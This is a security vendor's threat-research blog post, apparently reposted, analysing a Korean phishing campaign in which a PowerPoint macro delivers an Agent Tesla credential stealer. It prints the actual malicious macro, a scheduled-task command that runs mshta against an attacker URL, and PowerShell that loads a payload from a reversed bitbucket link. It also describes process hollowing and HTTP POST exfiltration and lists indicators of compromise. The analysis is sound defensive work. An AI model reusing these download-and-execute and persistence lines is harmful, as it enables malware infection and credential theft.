{"id":17988,"date":"2022-02-02T10:18:28","date_gmt":"2022-02-02T18:18:28","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11721\/"},"modified":"2022-02-02T10:18:28","modified_gmt":"2022-02-02T18:18:28","slug":"news-11721","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11721\/","title":{"rendered":"Phishing Campaign Targeting Korean to Deliver Agent Tesla New Variant"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs.html?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=FortiGuardLabs\">FortiGuard Labs<\/a>\u00a0Threat\u00a0Research Report<\/b><\/p>\n<p><b>Affected platforms:<\/b>\u00a0Microsoft Windows<br \/> <b>Impacted parties:<\/b>\u00a0 \u00a0 Windows Users<br \/> <b>Impact:<\/b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Collects sensitive information from victims\u2019 device<br \/> <b>Severity level<\/b>: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Critical<\/p>\n<p>A phishing campaign was recently caught in the wild by Fortinet\u2019s <a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguardlabs\">FortiGuard Labs<\/a>, that delivers a malicious Microsoft PowerPoint file. The content of the phishing email,\u00a0\u00a0written in Korean, asks recipients to open the attached PowerPoint file to review a purchase order. I researched what this malicious file does once the PowerPoint file is opened and have been able to confirm that it is spreading a new variant of Agent Tesla.<\/p>\n<p>Over the past several years, we have captured and analyzed many Agent Tesla variants. 
It has been quite active since 2014 when it was first observed. Agent Tesla is a .Net-based <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a> (developed in C#.Net, VB.Net, C++.Net, etc.) whose core function is to collect sensitive information from a victim\u2019s machine, including recording keystrokes and data on the system clipboard, stealing saved software credentials (browsers, mail clients, VPN, FTP, IM, etc.), stealing browser cookies files, and taking screenshots.\u00a0<\/p>\n<p>In this blog we will look at the phishing email, analyze the malicious macro contained in the attachment, show how the malware is updated and maintains persistence, examine the Agent Tesla payload, and show the ways it exfiltrates stolen data and credentials.\u00a0<\/p>\n<p>Let\u2019s start with how most cyberattacks begin \u2013 with a phishing email.<\/p>\n<h2>The Phishing Email<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image.img.png\/1639164322065\/picture1.png\" alt=\"Figure 1.1 \u2013 Display of the phishing email\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.1 \u2013 Display of the phishing email<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The phishing email is written in Korean and its translated content has been included on the right side of the image in Figure 1.1. The attacker attempts to lure the recipient into opening the attached file to confirm a purchase order. 
Fortinet\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a>\u00a0has identified this phishing email as SPAM and added the tag \u201c[SPAM detected by FortiMail]\u201d to the subject to warn the recipient, as shown in Figure 1.1.<\/p>\n<h2>Leverage Malicious Macro in PowerPoint<\/h2>\n<p>As you probably guessed, the attached file is fake. The PowerPoint file contains no slides, only a macro with an auto-run method called \u201cAuto_Open()\u201d. This method is called as soon as the file is opened in MS PowerPoint.\u00a0<\/p>\n<p>Here is the VBA code of this method:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<pre><code>Sub Auto_Open()\n\n    p_ = soraj.bear.GroupName\n    Shell p_\n\nEnd Sub<\/code><\/pre>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>In this code, \u201csoraj\u201d is the name of a UserForm and \u201cbear\u201d is the name of the CheckBox control inside the \u201csoraj\u201d form. 
It calls \u201cShell\u201d to execute a command read from the \u201cGroupName\u201d property of the \u201cbear\u201d CheckBox control.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1818358187.img.png\/1639079175801\/picture2.png\" alt=\"Figure 2.1 \u2013 The value of the property \u201cGroupName\u201d of \u201cbear\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2.1 \u2013 The value of the property \u201cGroupName\u201d of \u201cbear\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The value of \u201csoraj.bear.GroupName\u201d is \u201cmshta hxxp[:]\/\/bitly[.]com\/gdhamksgdsadj\u201d, as shown in Figure 2.1. It is stored in a binary profile file (named \u201co\u201d) of the VBA project.\u00a0<\/p>\n<p>It consists of \u201cmshta\u201d and a URL, where \u201cmshta\u201d (\u201cmshta.exe\u201d) is a default Windows program that executes HTML Application (HTA) files, including the scripts (such as VBScript) they contain. 
The URL opened by \u201cmshta\u201d is redirected to another URL, \u201chxxps[:]\/\/onedayiwillloveyouforever[.]blogspot.com\/p\/divine111.html\u201d, which contains a piece of code that writes escaped VBScript into the current HTML document, where it is executed by \u201cmshta.exe\u201d.<\/p>\n<p>Figure 2.2 is a screenshot from a proxy tool showing the URL redirection and the escaped VBScript code in the response.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1963402871.img.png\/1639079202288\/picture3.png\" alt=\"Figure 2.2 \u2013 The escaped VBScript code in the response packet\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2.2 \u2013 The escaped VBScript code in the response packet<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The escaped VBScript code is executed within the current HTML document by \u201cmshta.exe\u201d. I will refer to this kind of VBScript as VBScript-embedded-in-HTML in this analysis.\u00a0<a href=\"https:\/\/pastebin.com\/Sx5t7yKs\" target=\"_blank\">Click here<\/a>\u00a0to view the entire un-escaped code of the VBScript-embedded-in-HTML.<\/p>\n<h2>VBScript, PowerShell scripts for multiple tasks<\/h2>\n<p>The developer uses a variety of scripts, including VBScript-embedded-in-HTML, standalone VBScript, and PowerShell, during the delivery of Agent Tesla to make it harder to analyze.<\/p>\n<p>These scripts are split across many files and are downloaded at different times. 
The VBScript-embedded-in-HTML is the entry point of these scripts. In the following sections I will explain what they do, grouped by behavior.<\/p>\n<p><b>1. Upgrading \u2013 Task Scheduler:\u00a0<\/b><\/p>\n<p>The malware seeks to obtain a new version (if one is available) every two hours and execute it on the victim\u2019s system. To do this, the VBScript-embedded-in-HTML runs a command that adds a recurring task to Task Scheduler. The code snippet below runs the \u201cschtasks\u201d command with the \u201c\/create\u201d option to create a new scheduled task, as shown in Figure 3.1. The \u201cschtasks\u201d program name and the \u201copen\u201d verb are stored reversed and restored with StrReverse() at run time.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<pre><code>args = \"\/create \/sc MINUTE \/mo 120 \/tn \"\"\"\"update-Yendex \"\"\"\" \/F \/tr \"\"\"\"\"\"\"\"MsHtA\"\"\"\"\"\"\"\"hxxps:\/\/madarbloghogya.blogspot.com\/p\/divineback222.html\"\"\"\"\nSet Somosa = GetObject(\"new:13709620-C279-11CE-A49E-444553540000\")\n                    'schtasks                         'open\nSomosa.Shellexecute StrReverse(\"sksathcs\"), args, \"\", StrReverse(\"nepo\"), 0<\/code><\/pre>\n<\/div><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_169840373.img.png\/1639079232035\/picture4.png\" alt=\"Figure 3.1 
\u2013 Added scheduled task in Task Scheduler\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.1 \u2013 Added scheduled task in Task Scheduler<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It executes a VBScript code within a remote HTML file, then downloads the Agent Tesla payload to run on the victim\u2019s system. It also detects and kills any other Agent Tesla process instances already running. This allows it to perform its upgrading function.<\/p>\n<p><b>2.\u00a0Persistence \u2013 StartMenu Startup:\u00a0<\/b><\/p>\n<p>A standalone VBS file, \u201c%Public%<a href=\"https:\/\/pastebin.com\/1iKaC4ic\" target=\"_blank\">hulalalMCROSOFT.vbs<\/a>\u201d, extracted from VBScript-embedded-in-HTML downloads another base64-encoded VBS file from \u201chxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/5X7My8\/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb\/files\/divine1-2\u201d into a local file. Going through the base64-decoded code, it saves the VBS code to a file called \u201cUYA-update.vbs\u201c located under %Public% folder.<\/p>\n<p>This standalone VBS file downloads the Agent Tesla payload and deploys it on the victim\u2019s system. As a result, whenever the VBS file is executed it starts Agent Tesla.<\/p>\n<p>To keep Agent Tesla alive on the victim\u2019s system, it copies the downloaded standalone VBS file \u201cUYA-update.vbs\u201d into the StartMenu\u2019s Startup folder and renames it as \u201cGTQ.vbs\u201d. This allows it to start automatically when the system starts. 
Figure 3.2 displays the Startup folder with the copied \u201cGTQ.vbs\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1119377242.img.png\/1639079260737\/picture5.png\" alt=\"Figure 3.2 \u2013 Standalone VBS file copied in StartMenu Startup folder\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.2 \u2013 Standalone VBS file copied in StartMenu Startup folder<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b>3.\u00a0Perform process-hollowing:<\/b><\/p>\n<p>\u201cUYA-update.vbs\u201d continues to craft a piece of PowerShell code within a base64-decoded PE file from a local variable. It is ultimately executed by \u201cPowerShell.exe\u201d. The decoded PE file is a .Net program that contains a function named \u201cRun()\u201d belonging to class \u201cClassLibrary3.Class1\u201d. 
Below is a piece of PowerShell code used to call this function.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<pre><code>[System.AppDomain]::CurrentDomain.Load($fuUN).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('1-1enivid\/selif\/c4ab4d371cd40ce3303b4d33c868122f671fd37c\/do8qxn\/aygoh\/steppins\/0.2\/ipa!\/gro.tekcubtib\/\/:sptth'))<\/code><\/pre>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201c$fuUN\u201d variable contains the base64-decoded .Net PE file. The code loads it into the current AppDomain and calls GetType() and GetMethod() to obtain the function \u201cClassLibrary3.Class1.Run()\u201d. Next, it calls \u201cRun()\u201d through Invoke(), passing a single parameter: a reversed URL. Reversed back, the URL is \u201chxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1\u201d. 
Figure 3.3 shows the entire code of the function \u201cClassLibrary3.Class1.Run()\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1809766221.img.png\/1639095165212\/picture1.png\" alt=\"Figure 3.3 \u2013 Function of \u201cClassLibrary3.Class1.Run()\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.3 \u2013 Function of \u201cClassLibrary3.Class1.Run()\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Once &quot;ClassLibrary3.Class1.Run()&quot; of the decoded PE is called, it downloads two files: &#8216;hxxp[:]\/\/149.56.200.165\/rump\/1.txt&#8217;, another .Net module that performs the process hollowing, and &#8216;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1&#8217;, the URL passed in from PowerShell, from which it downloads the Agent Tesla payload.<\/p>\n<p>The Agent Tesla payload is fileless on the victim\u2019s system; it is kept only in the memory of the PowerShell process. The downloaded .Net module has a function named \u201cClassLibrary1.Class1.Run()\u201d that performs the process hollowing. It is passed the in-memory Agent Tesla payload together with the path of the target process, \u201cRegAsm.exe\u201d.\u00a0<\/p>\n<p>\u201cRegAsm.exe\u201d is an official component of the Microsoft .Net Framework. 
The attacker uses it as the target process into which the malware is injected, so that the malware is harder to detect.<\/p>\n<p>A number of Windows <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/api-security?utm_source=blog&amp;utm_campaign=api-security\">API<\/a> functions are called in the .Net module to deploy the Agent Tesla payload into the target process. These are:<\/p>\n<ul>\n<li>CreateProcess() with the\u00a0CREATE_SUSPENDED\u00a0flag: This creates a suspended RegAsm.exe process.<\/li>\n<li>VirtualAllocEx(), NtUnmapViewOfSection(), ReadProcessMemory(), WriteProcessMemory(): These unmap the original image and copy the Agent Tesla payload into newly allocated memory within the suspended RegAsm.exe process.<\/li>\n<li>SetThreadContext()\/Wow64SetThreadContext(), GetThreadContext()\/Wow64GetThreadContext(): These modify the register context of the suspended RegAsm.exe thread and point its EIP register to the entry point of the copied Agent Tesla payload.<\/li>\n<li>ResumeThread(): This resumes execution of\u00a0the RegAsm.exe process from the address EIP points to.<\/li>\n<\/ul>\n<p>Once this completes, Agent Tesla runs inside the RegAsm.exe process to steal the victim\u2019s information.<\/p>\n<h2>Agent Tesla Payload<\/h2>\n<p>Agent Tesla provides many features, such as a keylogger, collecting clipboard data, stealing browser cookies and saved software credentials, and capturing screenshots of the victim\u2019s device.\u00a0<\/p>\n<p>Agent Tesla comes with a Setup program that allows the attacker to choose which features to enable. The Agent Tesla Setup program then compiles the Agent Tesla payload file according to those choices.<\/p>\n<p>Agent Tesla starts these tasks in its Main() (stealing credentials), Timer (keylogger, stealing clipboard data, taking screenshots), and Thread (stealing cookies from browsers) functions.<\/p>\n<p>In this variant of Agent Tesla, the attacker has only enabled stealing credentials and cookies. 
It steals credentials from more than 70 software clients, which can be categorized as web browsers,\u00a0email clients,\u00a0IM clients,\u00a0VPN\/FTP\/downloader\/database\u00a0clients, and Windows credentials.\u00a0<\/p>\n<p>The affected\u00a0software\u00a0clients are\u00a0listed below:<\/p>\n<p><b>Chromium-based Web Browsers:<\/b><br \/>Epic Privacy, Uran, Chedot, Comodo Dragon, Chromium, Orbitum, Cool Novo, Sputnik, Coowon, Brave, Liebao Browser, Elements Browser, Sleipnir 6, Vivaldi, 360 Browser, Torch Browser, Yandex Browser, QIP Surf, Amigo, Kometa, Citrio, Opera Browser, CentBrowser, 7Star, Coccoc, and Iridium Browser.<\/p>\n<p><b>Web Browsers:<\/b><br \/>Chrome, Microsoft Edge, Firefox, Safari, IceCat, Waterfox, Tencent QQBrowser, Flock Browser, SeaMonkey, IceDragon, Falkon, UCBrowser, Cyberfox, K-Meleon, PaleMoon.<\/p>\n<p><b>VPN clients:<\/b><br \/>OpenVPN, NordVPN, RealVNC, TightVNC, UltraVNC, Private Internet Access VPN.<\/p>\n<p><b>FTP clients:<\/b><br \/>FileZilla, Cftp, WS_FTP, FTP Navigator, FlashFXP, SmartFTP, WinSCP 2, CoreFTP, FTPGetter.<\/p>\n<p><b>Email clients:<\/b><br \/>Outlook, Postbox, Thunderbird, Mailbird, eM Client, Claws-mail, Opera Mail, Foxmail, Qualcomm Eudora, IncrediMail, Pocomail, Becky! 
Internet Mail, The Bat!.<\/p>\n<p><b>Downloader\/IM clients:<\/b><br \/>DownloadManager, jDownloader, Psi+, Trillian.<\/p>\n<p><b>Others:<\/b><br \/>MySQL and Microsoft Credentials.<\/p>\n<p>Figure 4.1 displays the method used for stealing credentials from several clients.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_446925587.img.png\/1639095280352\/picture4.png\" alt=\"Figure 4.1 \u2013 Method used to steal credentials from some software clients\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.1 \u2013 Method used to steal credentials from some software clients<\/span>         <\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1609329313.img.png\/1639095322285\/picture2.png\" alt=\"Figure 4.2 \u2013 Display of stolen credentials from IceCat browser\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.2 \u2013 Display of stolen credentials from IceCat browser<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 4.2 shows credentials just stolen from the web browser \u201cIceCat\u201d, where \u201cBrowser\u201d is the software client name, \u201cPassword\u201d is the saved password, \u201cURL\u201d is the login page, and \u201cUserName\u201d is the saved login user name.\u00a0<\/p>\n<p>Each stolen credential has the structure shown above and is saved in a global list variable, which is later formatted and sent to the attacker.<\/p>\n<h2>Sending the Stolen Data to the Attacker<\/h2>\n<p>There are four ways to transport the stolen data to the attacker: FTP (uploading the stolen data in a file to an FTP server provided by the attacker), HTTP Post (sending the data as the body of a POST request to a URL provided by the attacker), SMTP (sending the stolen data to the attacker\u2019s email address), and Telegram\u00a0(using the\u00a0Telegram bot API \u201csendDocument()\u201d\u00a0to send files to a specified chat or channel).\u00a0<\/p>\n<p>The attacker chose HTTP Post for this variant. 
Once\u00a0Agent Tesla needs to send data to the attacker, it encrypts the stolen data using a DES algorithm and encodes the result using a base64 algorithm, which is the final data to be sent as the body in the HTTP Post request.\u00a0The submission URL is\u00a0&quot;hxxp[:]\/\/69[.]174.99[.]181\/webpanel-divine\/mawa\/7dd66d9f8e1cf61ae198.php&quot;, which is a hardcoded string in Agent Tesla.\u00a0<\/p>\n<p>Figure 5.1 demonstrates Agent Tesla sending stolen data as a value of \u201cp=\u201d in the body of HTTP POST.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_858549136.img.png\/1639095424767\/picture5.png\" alt=\"Figure 5.1 \u2013 Stolen data being sent in the body of HTTP Post\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.1 \u2013 Stolen data being sent in the body of HTTP Post<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Each item of stolen data before encryption is kept in the structure \u2014 \u201cheader\u201d + \u201cdata\u201d.\u00a0<\/p>\n<ul>\n<li>The \u201cheader\u201d contains the basic information of the victim\u2019s system:<\/li>\n<\/ul>\n<p>\u201cPacket number\u201d + \u201dSeparator\u201d + \u201cVictim ID\u201d + \u201dSeparator\u201d + \u201cDate and Time\u201d + \u201dSeparator string\u201d + \u201cUserName\/ComputerName\u201d + \u201dSeparator\u201d<\/p>\n<ul>\n<li>The \u201cdata\u201d contains the stolen information, like credentials and cookies.\u00a0<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn 
aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_68790556.img.png\/1639095484094\/picture6png.png\" alt=\"Figure 5.2 \u2013 Example of a packet structure with packet number \u201c6\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.2 \u2013 Example of a packet structure with packet number \u201c6\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i><br \/>  <\/i>Figure 5.2 shows an example of data with packet number \u201c6\u201d, which contains the basic information (\u201cheader\u201d part) and the Stolen Data (\u201cdata\u201d part) that is base64-encoded cookies. \u201c0de264895c1ed90486c73c6eb110af6c2222264a0854b0047b9ead88b718f7d0&quot;\u00a0is the Separator string that is hardcoded in Agent Tesla.<i>\u00a0<\/i><span>The Victim ID is a MD5 hash value generated from the system\u2019s hardware information.<\/span><\/p>\n<p>Agent Tesla provides seven kinds of packets to send data\/status to the attacker. Each packet has a packet number to identify the packet. They are \u201c0\u201d, \u201c1\u201d, \u201c2\u201d, \u201c3\u201d, \u201c4\u201d, \u201c5\u201d and \u201c6\u201d.<\/p>\n<ul>\n<li>Packet \u201c0\u201d: It is always the first packet to tell the attacker that Agent Tesla has started. It only contains the \u201cheader\u201d data.<\/li>\n<li>Packet \u201c1\u201d: It is sent once every 120 seconds. It is like a heartbeat to tell the attacker that Agent Tesla is alive. It only contains the \u201cheader\u201d data.<\/li>\n<li>Packet \u201c2\u201d: It is sent every 60 seconds and only contains the \u201cheader\u201d data. 
Agent Tesla reads the response and checks whether it contains \u201cuninstall\u201d. If it does, Agent Tesla removes itself from the victim\u2019s system, deleting every file it created and every registry key it added, and then exits the process.<\/li>\n<li>Packet \u201c3\u201d: sends the victim\u2019s keystrokes (keylogger data) and stolen clipboard contents in the \u201cdata\u201d part.<\/li>\n<li>Packet \u201c4\u201d: sends screenshots captured from the victim\u2019s screen in the \u201cdata\u201d part.<\/li>\n<li>Packet \u201c5\u201d: sends credentials stolen from the targeted software clients in the \u201cdata\u201d part.<\/li>\n<li>Packet \u201c6\u201d: sends cookie files collected from browsers, packed into a ZIP archive, in the \u201cdata\u201d part.<\/li>\n<\/ul>\n<h2>Conclusion<\/h2>\n<p>In this analysis, I have shown how this phishing campaign began by targeting Korean users.<\/p>\n<p>I then explained how the macro in the PowerPoint is used to execute a piece of VBScript embedded in HTML. 
It also leverages complex standalone VBS and PowerShell scripts to perform several tasks: updating itself, maintaining persistence, and process hollowing.<\/p>\n<p>I then elaborated on which software clients Agent Tesla targets and what data it is able to collect from them, as well as how the stolen data is sent to the attacker via HTTP POST.<\/p>\n<h2>Fortinet Protections<\/h2>\n<p>Fortinet customers are already protected from this malware by FortiGuard\u2019s <a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/web-filtering.html?utm_source=blog&amp;utm_campaign=web-filtering\">Web Filtering<\/a>, AntiVirus, <a href=\"https:\/\/www.fortiweb-cloud.com\/?utm_source=blog&amp;utm_campaign=fortiweb-cloud\">FortiEDR<\/a>, and CDR (content disarm and reconstruction) services, as follows:<\/p>\n<p>The malicious macro inside the PowerPoint sample can be disarmed by the FortiGuard CDR (content disarm and reconstruction) service.<\/p>\n<p>All relevant URLs have been rated as &quot;<b>Malicious Websites<\/b>&quot; by the FortiGuard Web Filtering service.<\/p>\n<p>The PowerPoint sample attached to the phishing email and the standalone VBS file are detected as &quot;<b>VBA\/Agent.BLY!tr<\/b>&quot; and &quot;<b>VBS\/AgentTesla.VTO!tr.dldr<\/b>&quot; respectively, and are blocked by the FortiGuard AntiVirus service.<\/p>\n<p>FortiEDR detects the downloaded executable file as malicious based on its behavior.<\/p>\n<p>FortiMail protects Fortinet customers by blocking phishing emails and applying FortiGuard\u2019s Web Filtering, AntiVirus, and CDR (content disarm and reconstruction) technologies.<\/p>\n<p>In addition to these protections, we suggest that organizations have their end users also go through the FREE <a href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE training<\/a>: <a 
href=\"https:\/\/training.fortinet.com\/local\/staticpage\/view.php?page=nse_1&amp;utm_source=blog&amp;utm_campaign=nse-1\">NSE 1 \u2013 Information Security Awareness<\/a>. It includes a module on Internet threats that is designed to help end users learn how to identify and protect themselves from phishing attacks.<\/p>\n<h2>IOCs<\/h2>\n<p><b>URLs Involved in the Campaign:<\/b><\/p>\n<p>&quot;hxxps[:]\/\/onedayiwillloveyouforever[.]blogspot[.]com\/p\/divine111.html&quot;<br \/> &quot;hxxps[:]\/\/madarbloghogya[.]blogspot[.]com\/p\/divineback222.html&quot;<br \/> &quot;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/5X7My8\/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb\/files\/divine1-2&quot;<br \/> &quot;hxxp[:]\/\/149[.]56.200[.]165\/rump\/1.txt&quot;<br \/> &quot;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1&quot;<br \/> &quot;hxxp[:]\/\/69[.]174.99[.]181\/webpanel-divine\/mawa\/7dd66d9f8e1cf61ae198.php&quot;<\/p>\n<p><b>Sample SHA-256 Involved in the Campaign:<\/b><\/p>\n<p>[\uc0c8\u00a0\uad6c\ub9e4\u00a0\uc8fc\ubb38\uc11c\u00a0.ppa \/ new purchase order.ppa]<br \/> AA121762EB34D32C7D831D7ABCEC34F5A4241AF9E669E5CC43A49A071BD6E894<br \/> [UYA-update.vbs \/ GTQ.vbs]\u00a0<br \/> <i>0BBF16E320FB942E4EA09BB9E953076A4620F59E5FFAEFC3A2FFE8B8C2B3389C<\/i><\/p>\n<p><i>Learn more about\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=FortiGuardLabs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0global threat intelligence and research and the\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/support\/support-services\/fortiguard-security-subscriptions\/fortiguard-services-bundles.html?utm_source=blog&amp;utm_campaign=fortiguard-service-bundles\"><i>FortiGuard Security Subscriptions and Services<\/i><\/a><i>\u00a0portfolio.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div 
